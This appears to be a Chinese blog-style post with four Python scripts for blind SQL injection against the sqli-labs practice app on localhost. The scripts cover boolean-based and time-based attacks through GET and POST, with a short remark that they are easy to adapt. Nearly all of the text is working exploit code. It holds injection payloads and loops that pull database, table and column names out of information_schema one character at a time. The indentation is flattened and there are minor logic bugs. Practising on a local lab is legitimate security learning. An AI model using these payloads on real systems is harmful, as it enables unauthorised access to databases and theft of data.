GET型bool注入
import requests
baseurl='http://127.0.0.1/sqli-labs/Less-5/'
db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''
result=''
#根据特定字符进行判断
right=''
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']
def dblenth(sql_payload):
global db_lenth
for j in range(1,100):
payload="?id=1' and length(({0}))={1}--+".format(sql_payload,j)
res=requests.get(baseurl+payload)
# print(len(res.text))
if len(res.text) ==704:
db_lenth=j
print(j)
return j
def dbname(lenth,sql_payload):
global db_name,result
for j in range(1,lenth+1):
for i in range(32,127):
url_payload="?id=1' and ascii(substr(({0}),{1},1))={2}--+".format(sql_payload,j,i)
res=requests.get(baseurl+url_payload)
#根据字节长度进行判断
#print(len(res.text))
if len(res.text)==704:
#print(chr(i))
result+=chr(i)
print(result)
continue
return result
#获取数据库名
dblenth(sql_payloads[0])
db_name=dbname(int(db_lenth),sql_payloads[0])
print('数据库名为'+db_name)
#获取表名
table_length=dblenth(sql_payloads[1])
table_name=dbname(int(db_lenth),sql_payloads[1])
print('表名为'+table_name)
#获取列名
columns_length=dblenth(sql_payloads[2])
columns_name=db_name=dbname(int(db_lenth),sql_payloads[2])
print('列名名为'+columns_name)
GET型延时注入
import requests
baseurl='http://127.0.0.1/sqli-labs/Less-6/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']
# result=''
payload=''
db_length=''
db_name=''
table_length=''
table_name=''
columns_length=''
columns_name=''
def get_respone(url):
try:
html = requests.get(url, timeout=2)
return False
except Exception as e:
print("......")
return True
def get_length(sql_payload):
for j in range(1,100):
payload='?id=1"and if(length(({0}))={1},sleep(3),2)--+'.format(sql_payload,j)
if get_respone(baseurl + payload):
print(j)
return j
def get_name(length,sql_payload):
result=''
for i in range(1,length+1):
for j in range(32,127):
payload = '?id=1" and if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)--+'.format(sql_payload,i,j)
if get_respone(baseurl + payload):
result+=chr(j)
print(result)
return result
#报表
db_length=get_length(sql_payloads[0])
db_name=get_name(int(db_length),sql_payloads[0])
print('数据库名为'+db_name)
#爆单
table_length=get_length(sql_payloads[1])
table_name=get_name(int(table_length),sql_payloads[1])
print('表名为'+table_name)
#爆列
columns_length=get_length(sql_payloads[2])
columns_name=get_name(int(columns_length),sql_payloads[2])
print('列名为'+columns_name)
POST型bool注入
import requests
baseurl='http://127.0.0.1/sqli-labs/Less-15/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']
db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''
def post_length(sql_payload):
for i in range(1,100):
payload="1'or length(({0}))={1}#".format(sql_payload,i)
data={'uname':payload,'passwd':'1','submit':'Submit'}
res=requests.post(baseurl,data=data)
#print(len(res.text))
# print(res.text)
if len(res.text)==1492:
print(i)
return i
def post_name(sql_payload,length):
result=''
for i in range(1,length+1):
for j in range(32,130):
payload = "1'or ascii(substr(({0}),{1},1))={2}#".format(sql_payload,i,j)
data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
res = requests.post(baseurl, data=data)
if len(res.text)==1492:
result+=chr(j)
print(result)
return result
#爆数据库名
db_lenth=post_length(sql_payloads[0])
db_name=post_name(sql_payloads[0],db_lenth)
print('数据库名为'+db_name)
#爆表名
table_length=post_length(sql_payloads[1])
table_name=post_name(sql_payloads[1],table_length)
print('表名为'+table_name)
#爆列名
columns_length=post_length(sql_payloads[2])
columns_name=post_name(sql_payloads[2],columns_length)
print('列名名为'+columns_name)
POST型延时注入
import requests
baseurl='http://127.0.0.1/sqli-labs/Less-15/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']
db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''
def post_length(sql_payload):
def post_respone(url):
try:
html = requests.post(url, data=data, timeout=2)
return False
except Exception as e:
print("......")
return True
for i in range(1,100):
payload="1'or if(length(({0}))={1},sleep(3),2)#".format(sql_payload,i)
data={'uname':payload,'passwd':'1','submit':'Submit'}
if post_respone(baseurl):
print(i)
return i
def post_name(sql_payload,length):
def post_respone(url):
try:
html = requests.post(url, data=data, timeout=2)
return False
except Exception as e:
print("......")
return True
result=''
for i in range(1,length+1):
for j in range(32,130):
payload = "1'or if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)#".format(sql_payload,i,j)
data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
if post_respone(baseurl):
result+=chr(j)
print(result)
return result
# #爆数据库名
db_lenth=post_length(sql_payloads[0])
db_name=post_name(sql_payloads[0],db_lenth)
print(db_name)
#爆表名
table_length=post_length(sql_payloads[1])
table_name=post_name(sql_payloads[1],table_length)
print('表名为'+table_name)
#爆列名
columns_length=post_length(sql_payloads[2])
columns_name=post_name(sql_payloads[2],columns_length)
print('列名名为'+columns_name)
其实写的四个脚本大多其实都是一样的,其实稍微改动一些就可以用了,整体思路都差不多。